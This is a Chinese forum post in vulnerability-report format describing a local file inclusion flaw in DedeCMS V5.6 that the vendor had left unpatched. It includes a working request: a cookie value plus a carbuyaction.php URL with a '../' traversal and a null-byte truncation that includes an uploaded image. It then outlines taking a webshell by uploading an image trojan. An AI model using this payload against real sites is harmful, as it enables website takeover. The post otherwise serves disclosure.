立即注册 找回密码
首页>站长交流专区>站长头条>DedecmsV5.6 本地包含漏洞
小草根

DedecmsV5.6 本地包含漏洞

作者:小草根   发布时间:2014-09-28 10:18   回复数:0   浏览数:490
小草根
4900小草根管理员
2014-09-28 10:18:05
4900 2014-09-28 10:18:05
话题: 本地 包含 漏洞
简要描述:[p=25, null, left][color=rgb(0, 0, 0)]DEDECMS 一个很久前的文件包含漏洞,这个漏洞长达几年,跨了几个版本,网上也公开过了,不知道是厂商不懂,还是什么,就是不修复。。。很多情况直接导致拿shell[/p]详细说明:[p=25, null, left][color=rgb(0, 0, 0)]http://www.shellsec.com/tech/3016.html

详细描述在这里。。



本地试了一下,最新版本一样可行。

首先利用cookie修改工具,加上 code=alipay

然后访问

http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00

直接包含成功



利用条件为GPC OFF ,或者某些环境下的截断。

可以在会员中心里上传个图片木马进行拿shell。

还可以包含dede自身文件进行更多利用,这里就不详细了。



[/p]漏洞证明:
[p=25, null, left][color=rgb(0, 0, 0)][/p]
分享喜欢 0回复
回复
游客
登录后才可以回帖,登录 或者 注册